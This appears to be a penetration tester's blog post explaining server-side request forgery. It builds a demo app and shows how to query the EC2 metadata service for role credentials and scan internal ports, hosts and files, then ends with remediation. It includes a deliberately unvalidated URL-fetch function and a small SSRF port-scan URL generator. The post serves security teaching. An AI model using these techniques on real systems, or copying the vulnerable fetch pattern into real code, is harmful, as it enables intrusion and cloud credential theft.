Manual Discovery

In the discovery phase, I noticed a function of the application that took a user-specified URL and displayed the first paragraph from that URL in the page.  This application allowed a user to share a URL with their friends, and grabbing the first paragraph was a feature that gave the friends more context.

The thing is, when I looked through my Burp history, I could not find the request to the URL I had specified.  That should raise an eyebrow!  It means the server is taking the URL I specified, making a request on my behalf, and then returning the result to me. That right there is SSRF.  The only question left was: what is the risk?

Automated Discovery

Since April 2015, if you are using Burp Collaborator (and you definitely should be), you should be able to detect SSRF by sending the vulnerable request to the active scanner.  The following image shows a few different ways Burp Collaborator can identify SSRF (as Out-of-band resource load and External service interaction).


Exploitation Demonstration

I wanted to demonstrate this SSRF vulnerability without sharing any details about the assessed application. To do this, I re-created the vulnerability by somehow hacking together my first Node.js application (and it actually worked).


My application, which for this demo is hosted on an Amazon EC2 micro instance, runs Node.js, and uses Express.js and Needle.js (which is what makes the SSRF request).

Just as the real application did, my demo application takes a URL specified by the user and makes a request using Needle.js. The real application accepted the user-supplied URL from a JSON parameter in the body; however, my Node skills are not there yet, so for my demo the URL is sent via a GET parameter.

This is the most pertinent part of the vulnerable app:
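The Node source is shown in the screenshot; the pattern it implements reduces to "fetch whatever URL the client supplies," which looks like this as a Python sketch:

```python
import urllib.request

# Python sketch of the vulnerable pattern (the actual demo app is
# Node/Express, with Needle making the outbound request).
def preview(url):
    # No validation of scheme, host, or port: the server fetches
    # whatever the client asked for, including internal addresses.
    return urllib.request.urlopen(url).read()
```

Because nothing is validated, the URL can just as easily point at link-local addresses or file:// resources.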

This is what it looks like in action:

It looks just like an iframe, doesn't it?   But if it were a typical iframe, your browser would be making the request itself, and the application would not be vulnerable to SSRF.

However, when I ask the vulnerable server to make a request to a site that shows the IP address and User-Agent of the requester, I can confirm the SSRF pretty clearly:

The two most interesting items are the source IP and the User-Agent.  This response proves that the request was sent by the EC2 instance, specifically by Needle, a Node.js HTTP client.

Who cares? What is the risk?  

Well, as mentioned above and discovered by many excellent researchers, if you can get the server to make a request for you, you can often gain access to things you otherwise would not have the ability to access.

Accessing the Amazon EC2 Metadata Service

For example, if your application is running on an Amazon EC2 instance, you can query the instance metadata service at (a non-routable link-local address).  This service is ONLY accessible from the instance itself, so without SSRF, command injection, or something similar, you would never be able to reach it.

This is just one example of a metadata object.  Erik Peterson (@silvexis) covers much more sensitive things that can potentially live in the metadata service in his excellent talk Bringing a Machete to the Amazon. For example, this next request allows an attacker to retrieve the temporary security credentials for the "admins" role, which would give an attacker access to your AWS resources.

Accessing the Amazon EC2 User Data Object

Another place you will want to look is the user-data object, located at  Amazon gives the following warning to devs:

But as we all know, if it is easier to store some passwords or other sensitive data in user-data, some people will, which is why you should check.  This is what that request looks like from my vulnerable EC2 instance:

For a complete list of what to look for if you have access to the EC2 metadata service, check out this document from Amazon: Instance Metadata and User Data.

Scanning and Accessing the Back End Infrastructure

In addition to checking the metadata service (and also looking for user data), you should try to exploit SSRF to look for services, hosts, and resources that are accessible via the vulnerable server, but not accessible to you directly. Burp Intruder is a great tool to accomplish each of these tasks.


Demo Setup

To set up for the demo, I am using a second EC2 instance running Kali, listening on an internal IP address on port 8080.  The web service on this host is not accessible from the Internet. In fact, the only connections allowed to it are from the internal IP address of the server that is vulnerable to SSRF, and only on port 8080/tcp.

Here is the EC2 security policy for the Kali instance (running Apache):

Scanning for ports (XSPA)

1) Make the initial request through Burp. In this example, I just attempted to access TCP port 1.

2) Send the initial request to Burp Intruder.

3) Set the payload position (to the port).

4) Set the payload itself. For the demo, I am selecting 11 sequential ports, but you could easily paste in the top X tcp ports from nmap or a list of common web server ports.

5) Start the attack.  As you can see from the screenshot below, there are a few potential ways to infer which port is open and which ports are closed.  In this case, you can use the response code OR the length of the response:

Alright! I just determined that the internal host is listening on port 8080, and that it is running a web server.
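The same Intruder run is easy to script. This sketch just generates the SSRF URLs for a port range (the vulnerable endpoint and the internal IP are hypothetical), which you would then request and sort by status code or response length:

```python
from urllib.parse import quote

def xspa_urls(vuln_base, host, ports):
    # One SSRF request per candidate port; open vs closed is inferred
    # from the status code or length of each response.
    return [vuln_base + quote(f"http://{host}:{p}/", safe='') for p in ports]

# Hypothetical vulnerable endpoint and internal target (11 sequential ports):
urls = xspa_urls("", "10.0.0.5", range(8075, 8086))
print(len(urls), "requests to send")
```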


Scanning for hosts

This follows the exact same steps as above, but instead of setting the port as the payload position, you set the IP address range you want to scan, so that you are probing a range of IP addresses on a particular port, like 80/tcp or 443/tcp.

It would look like this:

I did not want to actually scan other EC2 IPs, so I'm just leaving this example here.  Basically, you pick back up again at step 4 and everything else is the same as above.

You could also use the Cluster Bomb attack type in Burp and scan for ports and services at the same time.


Scanning the internal web server

Next, I'll repeat the process described above once more, but this time scanning for files and/or directories on a server, rather than for ports or hosts.

As this is my demo, I know the target file is located at users.txt, but I threw a few other pages into Burp Intruder to show what this would look like.   In a real-world scenario, you would want to use a wordlist of directories and file names from a resource like fuzzdb.

Just like in the previous examples, you can find a match by looking for a difference.  In this example, everything returns a 200 status, but the length of users.txt is shorter than all of the others. That is your first clue that you found a file that exists.

As with the ports and services example from above, you could also use the Cluster Bomb attack type in Burp to scan multiple web servers you have identified with the same file/directory list, all at the same time.


Remediation

Rather than proxying requests on behalf of users, the application should have the user’s browser retrieve the desired information. If it is necessary to proxy the request, a whitelist should be used on the server side, and the User-Agent information should be stripped or modified.

Additional Resources 

There are several great SSRF resources out there. In my opinion, Nicolas GrĂ©goire (@Agarri_FR) is the master of SSRF (and XXE), so if you have not read much about either, you need to check out some of his blog posts and talks.

One of my favorite talks: Nicolas GrĂ©goire - Hunting for Top Bounties
One of my favorite blog posts: Compromising an unreachable Solr server with CVE-2013-6397

I decided to blog about this because I just submitted an SSRF finding as a pull request to Mubix's Common Findings Database Project (CFDB). That finding has some of the same content I included here. In the CFDB finding, I include a bunch of links to prior work as well as some useful resources. 

I think CFDB is a great project, and sorely needed at this point in our industry.  I urge anyone who can contribute to do so.   

Final Thoughts

Unlike client side vulnerabilities like XSS and CSRF, SSRF can potentially give you access to back end infrastructure that you would not otherwise have access to. Keep an eye out for it, and if you do find it, remember to demonstrate the risk.

Did I miss the mark on anything? Was I inaccurate? Was this post helpful to you? Feedback is welcome and encouraged!